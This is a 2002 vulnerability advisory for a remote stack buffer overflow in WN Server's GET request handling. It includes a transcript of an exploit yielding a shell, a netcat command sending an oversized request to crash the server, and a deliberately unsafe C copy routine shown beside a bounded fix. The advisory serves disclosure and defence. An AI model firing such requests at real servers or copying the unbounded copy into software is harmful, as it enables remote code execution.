Buffer overflow in WN Server


I. BACKGROUND

John Franks's WN Server is an HTTP server designed to provide functionality usually available only with complex CGI programs without the necessity of writing or using these programs. It is included in the latest FreeBSD ports collection. More information about it is available at http://hopf.math.nwu.edu/.

II. DESCRIPTION

Remote exploitation of a buffer overflow in WN Server could allow arbitrary code execution under the privileges of the targeted server. Exploitation is possible by issuing WN Server a long GET request. Customized shell code is required to bypass the character filtering that WN Server imposes on the requested URI.

III. ANALYSIS

The following is a snapshot of an exploit at work:

$ (./wn_bof 0 3; cat) | nc target 80
Trying ret=0xbfbeb4ec
$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ uname
FreeBSD

Exploitation of a buffer overflow usually results in one of two things: the targeted process or application crashes, or arbitrary code executes. Both have serious repercussions, but in most cases code execution is the more threatening, since it can allow the further usurpation of higher-level privileges on the targeted host.
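The bug class the advisory describes, shown as an added illustration rather than WN Server's own source (which the advisory does not reproduce): a constructed request-line parser in its unbounded form, beside a bounded form that rejects an over-long URI before it copies or filters anything. URI_BUF, copy_uri_unsafe, copy_uri_bounded, parse_result and check_long_request are names chosen for this example, and the printable-ASCII filter is a stand-in for whatever filtering WN actually applies to the URI; the point it makes is that filtering which bytes are allowed does not bound how many arrive.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Fixed-size buffer a request handler might hold the URI in (example size). */
#define URI_BUF 256

/* UNSAFE pattern, constructed for illustration (not WN Server's code): the URI
 * is copied out of the request line into a fixed buffer with no length check,
 * so a request such as "GET /aaaa...a" longer than URI_BUF writes past the end
 * of the buffer on the stack. Never call this with untrusted input. */
int copy_uri_unsafe(const char *request_line, char uri[URI_BUF])
{
    const char *p = request_line;
    size_t i = 0;
    if (strncmp(p, "GET ", 4) != 0)
        return -1;
    p += 4;
    while (*p && *p != ' ' && *p != '\r' && *p != '\n')
        uri[i++] = *p++;                    /* i is never compared to URI_BUF */
    uri[i] = '\0';
    return 0;
}

/* Hardened form: measure first, reject anything that does not fit, then apply
 * the character filter, then copy with a bound derived from the destination.
 * Returns 0 on success, -1 bad method, -2 URI too long, -3 disallowed byte. */
int copy_uri_bounded(const char *request_line, char *uri, size_t uri_size)
{
    const char *start;
    size_t len, i;
    if (uri_size == 0 || strncmp(request_line, "GET ", 4) != 0)
        return -1;
    start = request_line + 4;
    len = strcspn(start, " \r\n");          /* URI ends at SP or end of line */
    if (len >= uri_size)
        return -2;                          /* reject; do not silently truncate */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)start[i];
        if (!isprint(c))                    /* example filter: printable ASCII only */
            return -3;
    }
    memcpy(uri, start, len);
    uri[len] = '\0';
    return 0;
}

/* Convenience wrapper: verdict of the bounded parser for one request line. */
int parse_result(const char *request_line)
{
    char uri[URI_BUF];
    return copy_uri_bounded(request_line, uri, sizeof uri);
}

/* Builds "GET /" followed by `fill` 'a' bytes, the shape of the advisory's
 * detection request, and returns the bounded parser's verdict on it. */
int check_long_request(size_t fill)
{
    static char line[4096];
    if (fill > sizeof(line) - 8)
        return -99;                         /* constructed line would not fit */
    memcpy(line, "GET /", 5);
    memset(line + 5, 'a', fill);
    memcpy(line + 5 + fill, "\r\n", 3);     /* copies the terminating NUL too */
    return check_long_request == NULL ? -99 : parse_result(line);
}

int main(void)
{
    printf("/index.html          -> %d\n", parse_result("GET /index.html HTTP/1.0\r\n"));
    printf("1600 'a' bytes       -> %d (rejected before any copy)\n", check_long_request(1600));
    printf("254 'a' bytes        -> %d (255-byte URI fits in %d)\n", check_long_request(254), URI_BUF);
    return 0;
}
```

With a 256-byte buffer a URI of 255 characters is the largest accepted; the 1601-character URI from the advisory's detection command is refused before a single byte is copied, so neither the crash nor the code-execution outcome is reachable through this path.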

IV. DETECTION

WN Server 1.18.2 through 2.0.0, which are included in the FreeBSD ports collection, are affected. Do the following to determine whether a specific WN implementation is susceptible:

1. Ensure that WN is running and open two terminals.
2. In the first terminal, execute the following command (the perl
   output deliberately omits the trailing newline, so the server does
   not process the request until 'enter' is pressed in step 5):
   (perl -e 'print "GET /" . "a"x1600';cat)|nc localhost 80
3. In the second terminal, determine the process ID of the child
   that was spawned to handle the previous command, and attach
   GDB to it via the following command set:
   # ps ax | grep swn
   4223 ?? Ss 0:00.29 ./swn
   4711 ?? S 0:00.01 ./swn
   # gdb ./swn 4711
   GNU gdb 4.18
   Copyright 1998 Free Software Foundation, Inc.
   ...
4. In the second terminal, type 'c'. This tells GDB to continue.
5. In the first terminal, press 'enter'. If at this point the following
   output is returned from GDB, then a vulnerable WN implementation
   is running (0x61616161 is the ASCII bytes "aaaa" from the request,
   which have overwritten the saved return address):
   Program received signal SIGSEGV, Segmentation fault.
   0x61616161 in ?? ()

V. WORKAROUND

No workaround is available as of this writing.

VI. VENDOR FIX/RESPONSE

John Franks released WN Server 2.4.4, which corrects this problem. It is available at http://hopf.math.nwu.edu/wn-2.4.4.tar.gz.

VII. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project assigned the identification number CAN-2002-1166 for this issue.

VIII. DISCLOSURE TIMELINE

8/29/2002 Issue disclosed to iDEFENSE
9/24/2002 John Franks notified via e-mail to john@math.northwestern.edu
9/24/2002 iDEFENSE clients notified
9/24/2002 Vendor response received
9/30/2002 Issue disclosed to public


IX. CREDIT

badc0ded (badc0ded@badc0ded.com) is credited with discovering this vulnerability.
